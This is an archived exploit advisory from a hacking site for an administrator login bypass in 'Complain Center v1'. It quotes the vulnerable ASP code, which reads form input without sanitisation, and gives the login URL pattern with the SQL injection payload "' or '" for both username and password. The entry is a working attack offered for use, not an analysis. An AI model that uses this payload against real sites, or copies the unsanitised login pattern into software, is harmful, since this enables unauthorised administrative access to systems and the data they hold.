AOH :: HP Unsorted C :: B06-4738.HTM

Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection



Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection
Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection



ENGLISH

# Title  :   Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection

# Author :   ajann

# Exploit;

[CODE]

loginprocess.asp:
..
...
dim varUser
dim varPass
varUser=Request.Form("TxtUser") No Secure : )
varPass=Request.Form("TxtPass") No Secure : )
..
...

//Before join login page
http://[target]/[path]/login.asp

Username : ' or '
Password : ' or ' and Login Ok

# ajann,Turkey

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.